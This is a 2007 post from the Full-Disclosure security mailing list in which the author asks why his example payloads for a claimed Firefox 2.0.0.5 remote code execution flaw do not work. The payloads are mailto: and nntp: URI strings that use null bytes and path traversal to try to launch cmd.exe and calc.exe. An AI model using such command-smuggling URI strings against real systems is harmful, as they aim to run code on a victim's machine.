[Full-disclosure] FIREFOX 2.0.0.5 new vulnerability

Mesut EREN meren at basakkiremit.com.tr
Wed Jul 25 09:38:57 BST 2007


Hi all,

FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But
don't work is code.

Example code is 

mailto:%00%00../../../../../../windows/system32/cmd".exe
../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:%00%00../../../../../../windows/system32/cmd".exe
../../../../../../../../windows/system32/calc.exe " - " blah.bat

Where i missing?



Mesut EREN
BAŞAK ÇATI & CEPHE SİSTEMLERİ
Bilgi İşlem Sorumlusu
MCSA:S,MCSE:S,CEH,CCNA
meren at basakkiremit.com.tr


-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070725/b006b026/attachment.html 


Full-Disclosure is hosted and sponsored by Secunia.